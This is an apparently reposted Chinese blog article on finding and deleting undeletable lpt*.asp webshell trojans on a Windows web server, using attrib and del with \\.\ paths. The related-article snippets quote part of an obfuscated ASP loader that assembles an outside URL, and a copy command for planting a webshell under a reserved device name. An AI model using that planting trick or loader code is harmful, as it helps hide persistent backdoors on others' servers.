服务器上碰到lpt*.asp一类的木马解决方法

最新推荐文章于 2024-07-30 21:21:31 发布
最新推荐文章于 2024-07-30 21:21:31 发布
阅读量447 收藏
点赞数
分类专栏: 服务器 文章标签: 服务器 运维
原文链接:https://www.cnblogs.com/fngblog/articles/4110780.html
版权

昨天一中学网站被黑,我远程帮忙,发现有一个4位数的数字文件夹,里面有lpt4.er.asp文件,当时就感觉此文件不对头,现将昨天的处理步骤记录一下,下次有个数,路过的碰到此类问题也可以借签一下.

此文件的属性是:RSAH ,无法常规下删除,下载粉碎机,网上多的是,把它强行删除,可马上又自动生成另一个4位数的数字文件夹,里面这文件还是存在,当时就马上网上找方法,找了许多,都是很乱,找了许多,综合了许多办法才找到解决的办法.

1.在开始--运行;输入:cmd  (进入DOS界面)

2.那服务器的病毒在D:\4805\ lpt4.er.asp,所以,我先把它去掉所有属性

attrib \\.\ d:\4805\lpt4.er.asp  -r -s -h

3. del \\.\ d:\4805\lpt4.er.asp

现总结一下:

1.此类asp木马,是由图片引起的,一般来说查看服务器上有没有不太常规命名的图片文件名.如:jdlkfl.as.jpg

一般都应该删除.而且如果是木马类的图片,一般图片大小不会太大,网络上传说3KB 左右。最好用缩略图的方式查看一下里面有没有什么内容,但不要打开图片。

2. 除网站盘符外,别的盘符也应该仔细查找。因为一般的杀毒软件是查杀不出来的。

3.此类lp*.asp木马病毒,只能在DOS下彻底删除,无法在windows界面删除的.请留意.

cookie-niu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
com1/lpt1/prn/nul 木马后门处理方法集合
01-10
删除命令 rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F 代码如下: <% ‘by*aming dim amxml,amtxt,amado amtxt=”h”&”t”&”t”&”p”&”:”&”/”&”/”&”b”&”o”&”t”&”.”&”z”&”h”&”-“&”c...
改制手柄驱动升级版支持lpt3.rar
01-27
【改制手柄驱动升级版支持lpt3.rar】是一个针对游戏手柄的驱动程序更新,主要目的是提升手柄在电脑上的兼容性和性能。这个压缩包包含了一系列与手柄驱动相关的文件,以确保手柄能够在使用LPT3(打印机并口)的计算机...
服务器无法删除文件上碰到lpt*.asp一类木马解决方法
资料汇总整理-仅供个人学习使用
11-23 332
服务器安全知识
删除lpt1.css.asp或com8.index.asp这类文件的方法_asp木马无法删除解决办法
winkexin的博客
05-06 801
D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\lpt6.80sec.asp 前面必须有 \\.\。然而在IIS中,这种文件又是可以解析成功的。Webshell中的 “不死僵尸” 原理就在这。删除:在命令提示符下输入:rd x:\你的文件夹名..\ /s /q,回车即可。比如:D:\wwwroot>rd /s D:\wwwroot。已复制 1 个文件。
文件 服务器属性,去除服务器文件上的RHS属性
weixin_32821257的博客
08-04 607
WINDOWS系统属性符号说明文件夹的属性有:无,H,HS,HSA,R,RA,RH,RHA。文件的属性有:A,RA,RSA,RHSA。其中:H(Hide)-隐藏、S(System)-系统、R(Read only)-只读、A(Archive)-存档。要删除这些属性的文件或文件夹,需要使用dos命令,很是繁琐。通过查找相关资料,整理出简便去除服务器文件RHS属性的方法,请新建文本文档,并将下述内容复制...
不死僵尸木马lpt7.asp.asplpt5.cnzzz.asp的删除方法
weixin_34077371的博客
01-08 323
1. Dos命令 我们知道Windows下是不能以“aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9”这些系统保留文件名来命名文件或文件夹的,但是通过copy命令却可以实现,方法就是在cmd中输入 copy E:\Web\asp\ww...
java LPT1_com1/lpt1/prn/nul 木马后门处理方法集合
weixin_42717586的博客
02-26 125
近期有朋友发现自己的网站目录下多出许多类似 aux.asp com1.gupiao.asp 的文件或文件夹,无法删除!这类文件为何无法删除,怎样建立无法删除的文件,又如何删除 aux.asp 这类 无法删除的文件 呢?在服务器中 文件夹选项 - 查看 -隐藏受保护的操作系统文件后可看到此类文件属性均为RHSA系统文件,无法删除、修改、移动。Windows 下不能够以下面这些字样来命名文件/文件夹,...
网站被挂com1.gupiao.asp和prn.liuhe.asp木马的删除方法
weixin_34414196的博客
04-15 96
今天检查服务器发现客户的一网站被挂马了,那个MJJ的建了很多文件: prn.gupiao.asp prn.liuhe.asp prn.shouji.asp com1.gupiao.asp com1.liuhe.asp com1.shouji.asp com8.gp88.asp com8.gp.asp com8.lh88.asp com8.sj88.asp con.baidu...
网络攻防|Web后门知识详解
weixin_42282189的博客
10-26 5602
作者: h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 0x01 Webshell是什么 1.1 Shell(计算机壳.
aux、com1、com2、prn、con、nul漏洞木马删除方法
六维的专区
07-09 926
原文转载于: http://www.ttkc.net/knowlage/413.htm 今天谷歌搜索 inurl:file filetype:asa ,有大发现! http://www.roulvwang.com.cn/aux/(&$'='$&)./aux.asa?file=/REVKH/82522/about:blank http://www.zhongliu888.cn/c...
lpt.zip_LPT print_lpt_lpt-vb.zip
09-14
"lpt.zip_LPT print_lpt_lpt-vb.zip"这个压缩包文件包含了一个解决特定打印问题的解决方案,它针对的是LPT(Line Printer Terminal)接口的打印功能。LPT接口是早期个人计算机上用于连接打印机的标准接口,虽然现在...
B52.rar_L.E.L_lpt
09-23
CFile是MFC库中的一个核心类,它提供了一个抽象层来处理文件操作,包括读取、写入、打开、关闭等。这个类不仅适用于磁盘文件,还可以用于与不同类型的I/O设备交互,例如串行和并行端口。通过CFile,开发者可以避免...
Linux基础命令
weixin_68540670的博客
07-25 1552
Linux中一切从根开始Linux中一切皆文件。
Apollo使用(3):分布式docker部署
游王子的博客
07-24 716
Apollo 1.7.0版本开始会默认上传Docker镜像到,可以按照如下步骤获取。
使用易备数据备份软件,践行虚拟机最佳备份方案
sanyuan7783的博客
07-26 915
新的关键业务应用程序有助于为容器和容器化工作负载赋予更大动力。但是,在可预见的未来,虚拟机的应用仍会普遍存在。容器和虚拟机可以很好地协同工作,适用于大多数关键的 IT 基础设施。因此,备份虚拟机及其包含的数据、服务和应用程序仍然是企业至关重要的任务。本文以 VMware vSphere 虚拟机为例,介绍虚拟机备份的最佳实践方法
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 848
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
IT运维必备神器!PsShutdown,定时关机重启一键搞定!
最新发布
weixin_39410685的博客
07-30 478
下次见,我们后会有期!当你坐在电脑前,手指轻轻敲几下键盘,就能实现定时任务,无论是关机、重启,还是注销用户,甚至是锁屏,都尽在掌握之中;别急,咱们先不聊那些冷冰冰的功能参数,来聊聊它背后的故事这个名字听起来就带着一股子神秘感,它出自Sysinternals这个大名鼎鼎的宝库,那可是微软旗下的技术大佬们的智慧结晶啊。而且哦,这款工具的使用体验简直不要太友好,不需要繁琐的安装过程,只需要简单几步,就能让它成为你电脑里的得力助手;无论你是IT界的老司机,还是刚入门的小白,都能轻松上手,享受它带来的便捷与高效;
Docker容器下面home assistant忘记账号密码怎么重置?
玩人工智能的辣条哥的博客
07-30 161
docker ha。
印度东海岸三角洲河流流量与沉积物随机模拟:变化趋势与预测方法
总结来说,这篇论文不仅关注印度东海岸河流的流量与沉积物的数学建模,还强调了自然与人为因素对水文过程的影响,并展示了如何通过统计方法来理解和预测这些复杂系统的行为,以便于更好地保护和利用这一区域的宝贵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值